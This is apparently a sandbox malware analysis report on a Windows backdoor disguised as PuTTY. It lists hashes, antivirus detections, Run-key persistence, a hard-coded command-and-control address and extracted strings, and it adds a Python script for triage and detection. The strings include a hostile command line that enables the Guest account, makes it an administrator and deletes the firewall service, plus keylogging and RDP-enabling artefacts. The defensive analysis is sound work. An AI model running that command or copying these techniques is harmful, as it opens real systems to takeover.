Analysis Date: 2015-03-14 11:46:18
MD5: 92c9c9a8a135a09eafdf6a007eb9bd8e
SHA1: 4429a154ca0f4b348bb900ec57d6dda14931312a

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: 95e4b0120aa46aec68bb9dba841cc044  sha1: 55a1227955fc7e3987ddc78c2ad0e52372e203a0  size: 110592
Section .rdata  md5: e70c6dd6ab73620014635ef7fc462540  sha1: 407cfba9474fd2cb2c8cd2e7e920d49475971665  size: 16384
Section .data   md5: da14606f72453fab1c3cb132a2118a7c  sha1: 5f3c7807b785c6e1d7b23b868a1064a979eef5b0  size: 12288
Section .rsrc   md5: 320d8d8836332ca004a79f9f124b8963  sha1: 6f8b0cc6a8a9390dcc843bf7ec6e6215dcb8be53  size: 4096
Timestamp: 2014-05-31 12:46:02 (PE header compile timestamp; attacker-controlled, so treat as a hint only)
Pdb path: (not extracted by the static parser; the Strings section below contains \Server\svchost\Release\server.pdb)
Version resource:
LegalCopyright: 版权所有(C) 2014 (Chinese: "All rights reserved (C) 2014")
InternalName:
FileVersion:
CompanyName: putty
PrivateBuild:
LegalTrademarks:
Comments:
ProductName:
SpecialBuild:
ProductVersion:
FileDescription: www.putty.com
OriginalFilename:
The CompanyName and FileDescription fields borrow PuTTY's name; the Chinese copyright string, the otherwise empty version fields and the server.pdb path in the strings show this is not a PuTTY build.
PEhash: b5fd5901fefd2c8c09402669105b3cf6fa5756ec
IMPhash: cb871d0278281aa3fb8279fd1a657917
AV results (20 of 29 engines detect, 8 report clean, 1 scan error; the named families cluster on Farfli, Zegost and Gen:Variant.Kazy.385920):
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Variant.Kazy.385920
AV Alwil (avast): GenMaliciousA-BJK [Trj]
AV Arcabit (arcavir): Gen:Variant.Kazy.385920
AV Authentium: W32/A-10f7c05c!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen7
AV BullGuard: Gen:Variant.Kazy.385920
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): Backdoor.Zegost.BZ4
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader11.17136
AV Emsisoft: Gen:Variant.Kazy.385920
AV Eset (nod32): Win32/Farfli.AXW
AV Fortinet: W32/Farfli.AWN!tr
AV Frisk (f-prot): no_virus
AV F-Secure: Gen:Variant.Kazy.385920
AV Grisoft (avg): BackDoor.Generic_r.HBR
AV Ikarus: Trojan-GameThief.Win32.Magania
AV K7: Trojan ( 0049ae911 )
AV Kaspersky 2015: Backdoor.Win32.Farfli.cil
AV MalwareBytes: no_virus
AV Mcafee: Generic-FASR!92C9C9A8A135
AV Microsoft Security Essentials: Backdoor:Win32/Zegost.BZ
AV MicroWorld (escan): Gen:Variant.Kazy.385920
AV Rising: no_virus
AV Sophos: Error Scanning File
AV Symantec: no_virus
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): BScope.P2P-Worm.Palevo

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL (value not present, i.e. no proxy configured)
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\admin ➝ C:\malware.exe followed by a long run of \x00 bytes (autostart persistence under the value name "admin"; the trailing NULs are consistent with a zero-filled fixed-size buffer being written in full, so a naive string match on the REG_SZ data may fail unless it stops at the first NUL)
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc (LSA RPC pipe; matches the LsaOpenPolicy / LsaRetrievePrivateData imports in the strings)
Creates File: \Device\Afd\Endpoint (Winsock socket creation)
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
The index.dat files and the WinINet mutexes are side effects of the WinINet calls the sample imports (InternetOpenA, InternetOpenUrlA, InternetReadFile), not dropped payloads.

Network Details:

Flow TCP: 192.168.1.1:1031 ➝ 216.99.157.163:7777
Flow TCP: 192.168.1.1:1031 ➝ 216.99.157.163:7777
Flow TCP: 192.168.1.1:1032 ➝ 216.99.157.163:7777
Flow TCP: 192.168.1.1:1033 ➝ 216.99.157.163:7777
Flow TCP: 192.168.1.1:1034 ➝ 216.99.157.163:7777
Flow TCP: 192.168.1.1:1035 ➝ 216.99.157.163:7777
Flow TCP: 192.168.1.1:1036 ➝ 216.99.157.163:7777
Six connections to the same endpoint from consecutive source ports (1031-1036) in one run: the sample reconnects in a retry loop rather than holding one session. The address 216.99.157.163 is also embedded as a plain string in the binary (see Strings), so it is a hard-coded C2, not a resolved name.

Raw Pcap (captured payload of each flow; only two bytes per flow were recorded, so no C2 handshake or protocol framing is visible):
0x00000000 (00000)   e901                                  ..
0x00000000 (00000)   e501                                  ..
0x00000000 (00000)   e601                                  ..
0x00000000 (00000)   e701                                  ..
0x00000000 (00000)   e601                                  ..
0x00000000 (00000)   e601                                  ..

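The runtime and network observations above are the kind of thing a triage rule set should catch. The following is an added example written for this page, not part of the sandbox report or the sample: it runs a few rules over constructed events that mirror what was logged here (the Run\admin value written with NUL padding, six connects to 216.99.157.163:7777 from consecutive source ports) plus two behaviours the runtime log did not record but the Strings section contains (the CMD.EXE /C NET USER GUEST ... command line, and the fDenyTSConnections / Terminal Server keys, modelled here as a write of 0). The Sysmon-like field names and the event layout are assumptions for the example.

```python
"""Triage rules for the behaviours in this report, run over constructed events.

Added example, not part of the sandbox report or the sample. EVENTS below are
constructed (not real telemetry) to mirror the report; the fDenyTSConnections
write and the CMD.EXE command line are taken from the sample's strings, the
sandbox run did not record them executing. Field names are an assumption.
"""
import re
from collections import defaultdict

RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)
TS_DENY = re.compile(r"\\Terminal Server\\fDenyTSConnections$", re.I)
# Fragments of the command line embedded in the sample. Matched case-insensitively
# because the binary inverts the case of some words (sHAREDaCCESS) and Windows
# does not care.
CMD_PATTERNS = {
    "guest_enabled": re.compile(r"net\s+user\s+guest\s+/active:yes", re.I),
    "guest_to_admins": re.compile(r"net\s+localgroup\s+administrators\s+guest\s+/add", re.I),
    "firewall_service_removed": re.compile(r"sc\s+delete\s+sharedaccess", re.I),
}

# Constructed events modelled on the report above.
EVENTS = [
    {"type": "registry_set", "image": "C:\\malware.exe",
     "target": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\admin",
     "data": b"C:\\malware.exe" + b"\x00" * 32},
    {"type": "registry_set", "image": "C:\\malware.exe",
     "target": "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections",
     "data": (0).to_bytes(4, "little")},
    {"type": "process_create", "image": "C:\\WINDOWS\\system32\\CMD.EXE",
     "parent": "C:\\malware.exe",
     "cmdline": 'CMD.EXE /C NET USER GUEST /ACTIVE:yes && NET USER GUEST ++++++ && '
                'NET LOCALGROUP ADMINISTRATORS GUEST /add && NET STOP sHAREDaCCESS /Y && '
                'DEL "C:\\malware.exe" && SC DELETE sHAREDaCCESS'},
] + [
    {"type": "network_connect", "image": "C:\\malware.exe",
     "src": ("192.168.1.1", port), "dst": ("216.99.157.163", 7777)}
    for port in range(1031, 1037)
]


def clean_reg_data(data: bytes) -> str:
    """REG_SZ data as logged; the sample wrote a zero-filled buffer, so cut at the first NUL."""
    return data.split(b"\x00", 1)[0].decode("latin-1")


def triage(events):
    """Return (rule, subject, detail) findings, registry/process first, network last."""
    findings = []
    connects = defaultdict(set)   # (image, dst) -> source ports used
    for ev in events:
        if ev["type"] == "registry_set":
            if RUN_KEY.search(ev["target"]):
                findings.append(("run_key_persistence", ev["target"], clean_reg_data(ev["data"])))
            elif TS_DENY.search(ev["target"]) and int.from_bytes(ev["data"], "little") == 0:
                findings.append(("rdp_enabled", ev["target"], "fDenyTSConnections=0"))
        elif ev["type"] == "process_create":
            for rule, pattern in CMD_PATTERNS.items():
                if pattern.search(ev["cmdline"]):
                    findings.append((rule, ev["parent"], ev["cmdline"][:40]))
        elif ev["type"] == "network_connect":
            connects[(ev["image"], ev["dst"])].add(ev["src"][1])
    # Several connects to one endpoint from consecutive ephemeral ports in one run
    # is the reconnect loop seen in the Flows list, not a single session.
    for (image, (host, port)), ports in connects.items():
        ordered = sorted(ports)
        if len(ordered) >= 3 and ordered[-1] - ordered[0] == len(ordered) - 1:
            findings.append(("beacon_retry_loop", image,
                             f"{host}:{port} x{len(ordered)} from ports {ordered[0]}-{ordered[-1]}"))
    return findings


if __name__ == "__main__":
    for rule, subject, detail in triage(EVENTS):
        print(f"{rule:26} {subject}  {detail}")
```

The registry data is cut at the first NUL before comparison; matching the raw padded value against "C:\malware.exe" would miss it. The command-line patterns are deliberately loose on whitespace and case because the binary inverts the case of "SharedAccess" and the shell resolves it anyway.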

Strings
TranslateMessage
DispatchMessageA
zy
InitializeCriticalSection
KERNEL32.dll
DeleteFileA
lstrlenA
KERNEL32.dll
CharNextA
USER32.dll
GetLastError
KERNEL32.dll
GetFileAttributesA
CreateDirectoryA
\
FreeLibrary
KERNEL32.dll
open
glstrlenA
KERNEL32.dll
FreeLibrary
Shell32.dll
lstrlenA
KERNEL32.dll
GetDiskFreeSpaceExA
GetDriveTypeA
%s\*.*
hh
wsprintfA
USER32.dll
%s\*.*
DeleteFileA
LocalAlloc
KERNEL32.dll
lstrlenA
KERNEL32.dll
iKERNEL32.dll
LocalFree
LocalAlloc
KERNEL32.dll
jLocalFree
KERNEL32.dll
lstrlenA
KERNEL32.dll
lstrlenA
KERNEL32.dll
USER32.dll
wsprintfA
pplstrlenA
KERNEL32.dll
system\cURRENTcONTROLsET\sERVICES\%s
system\cURRENTcONTROLsET\sERVICES\%s
InstallModule0
tluafed\0atsniw
tluafed\0atsniw
system\cURRENTcONTROLsET\sERVICES\%s
.
[Z
%s:\dOCUMENTS
wINSTA0\dEFAULT
{|{|
\ourlog.dat
GetKeyState
GetAsyncKeyState
\ourlog.dat
}
~\ourlog.dat
%24s
%15s
SystemParametersInfoA
keybd_event
v
stu
.ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
http://
https://
Mozilla/4.0 (compatible)
capGetDriverDescriptionA
AVICAP32.dll
avp.exe
360tray.exe
KvMonXP.exe
RavMonD.exe
360sd.exe
Mcshield.exe
egui.exe
kxetray.exe
knsdtray.exe
TMBMSRV.exe
avcenter.exe
ashDisp.exe
system\cURRENTcONTROLsET\sERVICES\%s
f
:\
tluafed\0atsniw
.
.KERNEL32.dll
lstrlenA
.EXPLORER.EXE
Mozilla/4.0 (compatible)
capGetDriverDescriptionA
AVICAP32.dll
capCreateCaptureWindowA
AVICAP32.dll
paCoediVC
wx
.

080404b0 (VS_VERSION_INFO translation: language 0x0804 = Chinese (Simplified), code page 0x04b0 = Unicode)
Ajjjj
(C) 2014
Comments
CompanyName
FileDescription
FileVersion
InternalName
jjjj
@jjjj
jjjjh
jjjjj
jjjjjj
jjjjjjj
jjjjjjjjh
LegalCopyright
LegalTrademarks
OriginalFilename
PrivateBuild
ProductName
ProductVersion
putty
SpecialBuild
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
www.putty.com
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z
0ddmREt\SECIVREs\TEsLORTNOcTNERRUc\metsys
0NOGOLNIw\NOISREvTNERRUc\tn SWODNIw\TFOSORCIm\erawtfos
0NOISREvTNERRUc\SWODNIw\TFOSORCIm\erawtfos
0s%rCtlus%L
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
??1type_info@@UAE@XZ
216.99.157.163
%-24s %-15s 
%-24s %-15s 0x%x(%d) 
??2@YAPAXI@Z
#32770
??3@YAXPAX@Z
{4_^]3
9_|t93
~(9~$u
A<;B(}
A@;B,}
AddAccessAllowedAce
AdjustTokenPrivileges
Administrators
advapi32.dll
ADVAPI32.dll
AheadLib
AllocateAndInitializeSid
Application
\Application Data\Microsoft\Netw
\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
.?AVtype_info@@
Backspace
bad Allocate
bad buffer
_beginthreadex
BitBlt
BlockInput
<body><h1>403 Forbidden</h1></body>
buffer error
BuildExplicitAccessWithNameA
calloc
CancelIo
[CapsLock]
C:\Documents and Settings\Administrator\
ClearEventLogA
CloseClipboard
CloseDesktop
CloseEventLog
CloseHandle
CloseServiceHandle
CloseWindow
\CMD.EXE
CMD.EXE /C NET USER GUEST /ACTIVE:yes && NET USER GUEST ++++++ && NET LOCALGROUP ADMINISTRATORS GUEST /add && NET STOP sHAREDaCCESS /Y && DEL "%s" && SC DELETE sHAREDaCCESS
CONNECT 
ControlService
ConvertSidToStringSidA
CreateCompatibleBitmap
CreateCompatibleDC
CreateDIBSection
CreateEnvironmentBlock
CreateEventA
CreateFileA
CreatePipe
CreateProcessA
CreateProcessAsUserA
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
ctions\pbk\rasphone.pbk
__CxxFrameHandler
_CxxThrowException
D$(8D*
@.data
data error
.DEFAULT\Keyboard Layout\Toggle
 deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly 
Delete
DeleteCriticalSection
DeleteDC
DeleteFileA
DeleteObject
DeleteService
DestroyCursor
Device
DialParamsUID
DisconnectNamedPipe
DllCanUnloadNow
DllGetClassObject
DNAMMOC\NEPO\LLEHS\EXE.EROLPXEI\SNOITACILPPa
Documents an
Documents and Settings\
DownArrow
;D$<s!
d Settings\
D$$SUV
DuplicateTokenEx
edentials#
EmptyClipboard
empty distance tree with lengths
eNABLEaDMINtsREMOTE
eNABLED
<Enter>
EnterCriticalSection
EnumProcessModules
EnumWindows
_errno
Everyone
_except_handler3
Execute
ExitProcess
ExitWindowsEx
fDenyTSConnections
Fdf+Fh
file error
FindClose
FindFirstFileA
FindNextFileA
FreeLibrary
FreeSid
g:]%d-%d-%d  %d:%d:%d
GDI32.dll
GetClipboardData
GetCurrentProcess
GetCurrentThreadId
GetCursorInfo
GetCursorPos
GetDesktopWindow
GetDIBits
GetDiskFreeSpaceExA
GetDriveTypeA
GetFileSize
GetForegroundWindow
GetLastError
GetLengthSid
GetLocalTime
GetLogicalDriveStringsA
GetMessageA
GetModuleFileNameA
GetModuleFileNameExA
GetNamedSecurityInfoA
GetPrivateProfileSectionNamesA
GetPrivateProfileStringA
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoA
GetSystemDirectoryA
GetSystemInfo
GetSystemMetrics
GetThreadDesktop
GetTickCount
GetTokenInformation
GetUserObjectInformationA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
GetWindowTextA
GetWindowThreadProcessId
GlobalAlloc
GlobalFree
GlobalLock
GlobalMemoryStatus
GlobalSize
GlobalUnlock
}!h0/B
HARDWARE\DESCRIPTION\System\CentralProcessor\0
HeapAlloc
HeapFree
Hotkey
|$HPWS
HrCg@b	g(
http://
HTTP/1.0 200 OK
Http/1.1 403 Forbidden
ICClose
ICCompressorFree
ICOpen
ICSendMessage
ICSeqCompressFrame
ICSeqCompressFrameEnd
ICSeqCompressFrameStart
incompatible version
incomplete distance tree
incomplete dynamic bit lengths tree
incomplete literal/length tree
incorrect data check
incorrect header check
 inflate 1.1.4 Copyright 1995-2002 Mark Adler 
InitializeAcl
InitializeCriticalSection
InitializeSecurityDescriptor
Insert
iNSTALLER
insufficient memory
InterlockedExchange
InternetCloseHandle
InternetGetConnectedState
InternetOpenA
InternetOpenUrlA
InternetReadFile
invalid bit length repeat
invalid block type
invalid distance code
invalid literal/length code
invalid stored block lengths
invalid window size
IsValidSid
IsWindow
IsWindowVisible
Kernel32.dll
KERNEL32.dll
kugou_SetPlayerConfigDelegate
LeaveCriticalSection
LeftArrow
L$LQVS
LoadCursorA
LoadLibraryA
LocalAlloc
LocalFree
LocalReAlloc
LocalSize
LookupAccountNameA
LookupAccountSidA
LookupPrivilegeValueA
L$,QWV
L$ RUPj
LsaClose
LsaFreeMemory
LsaOpenPolicy
LsaRetrievePrivateData
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrlenA
malloc
MapVirtualKeyA
memcpy
memmove
memset
MessageBoxA
Microsoft\Network\Conne
Microsoft\Network\Connections\pbk\rasphone.pbk
mouse_event
MoveFileA
MSVCP60.dll
MSVCRT.dll
MSVFW32.dll
MultiByteToWideChar
need dictionary
NETCACHE
Num Lock
OpenClipboard
OpenDesktopA
OpenEventA
OpenEventLogA
OpenInputDesktop
OpenProcess
OpenProcessToken
OpenSCManagerA
OpenServiceA
OpenWindowStationA
ork\Connections\pbk\rasphone.pbk
OutputDebugStringA
oversubscribed distance tree
oversubscribed dynamic bit lengths tree
oversubscribed literal/length tree
PageDown
PageUp
PeekNamedPipe
PhoneNumber
PortNumber
PostMessageA
Process32First
Process32Next
PSAPI.DLL
Qhvidc
QueryMediaInfo
QueryServiceStatus
rams!%
$_RasDefa
RasDia
`.rdata
ReadFile
realloc
REG_BINARY
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteValueA
REG_DWORD
RegEnumKeyExA
RegEnumValueA
REG_EXPAND_SZ
REG_MULTI_SZ
RegOpenKeyA
RegOpenKeyExA
RegQueryValueA
RegQueryValueExA
RegQueryValueEx(Type)
RegSetKeySecurity
RegSetValueExA
RegSetValueEx(start)
REG_SZ
ReleaseDC
RemoveDirectoryA
ResetEvent
ResumeThread
RightArrow
Scroll
\secivreS\teSlortnoCtnerruC\METSYS
Security
SeDebugPrivilege
Select
SelectObject
SendMessageA
server.dat
\Server\svchost\Release\server.pdb
SeShutdownPrivilege
SetCapture
SetClipboardData
SetCursorPos
SetEntriesInAclA
SetErrorMode
SetEvent
SetFilePointer
SetLastError
SetNamedSecurityInfoA
SetProcessWindowStation
SetRect
SetSecurityDescriptorDacl
SetThreadDesktop
SetTokenInformation
SHDeleteKeyA
Shell32.dll
SHELL32.dll
ShellExecuteA
SHGetFileInfoA
SHGetSpecialFolderPathA
SHLWAPI.dll
sHUTDOWNwITHOUTLOGON
%slPa%ss#0
Snapshot
_snprintf
sOFTWARE\mICROSOFT\iNTERNET eXPLORER\mAIN
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
sOFTWARE\pOLICIES\mICROSOFT\wINDOWS
sprintf
%s%s*.*
%s%s%s
strcat
strchr
strcmp
_strcmpi
strcpy
stream end
stream error
strlen
strncat
strncmp
strncpy
_strnicmp
strrchr
_strrev
strstr
strtok
_strupr
System
SYSTEM
system\cURRENTCONTROLSET\cONTROL\tERMINAL sERVER
SYSTEM\CurrentControlSet\Control\Terminal Server
SYSTEM\CurrentControlSet\Control\Terminal Server\RDPTcp
SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp
SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
system\cURRENTcONTROLSET\sERVICES\tERMSERVICE
T+3x%A
T$DPVS
TerminateProcess
TerminateThread
!This program cannot be run in DOS mode.
T$LPQR
T$LRWS
too many length or distance symbols
T$,PQh
T$(PQR
T$,RWV
tseNABLED
tZ9H tU9H$tP
unknown compression method
UpArrow
USER32.dll
USERENV.dll
VirtualAlloc
VirtualFree
W(9W$u
WaitForMultipleObjects
WaitForSingleObject
waveInAddBuffer
waveInClose
waveInGetNumDevs
waveInOpen
waveInPrepareHeader
waveInReset
waveInStart
waveInStop
waveInUnprepareHeader
waveOutClose
waveOutGetNumDevs
waveOutOpen
waveOutPrepareHeader
waveOutReset
waveOutUnprepareHeader
waveOutWrite
WideCharToMultiByte
WindowFromPoint
Window Title
WinExec
WININET.dll
Winlogon
WINMM.dll
winsta0
WriteFile
WS2_32.dll
WSAIoctl
wsprintfA
WTSAPI32.dll
WTSFreeMemory
WTSGetActiveConsoleSessionId
WTSQuerySessionInformationA
WTSQueryUserToken
|$ WUSV
[xiao:] %s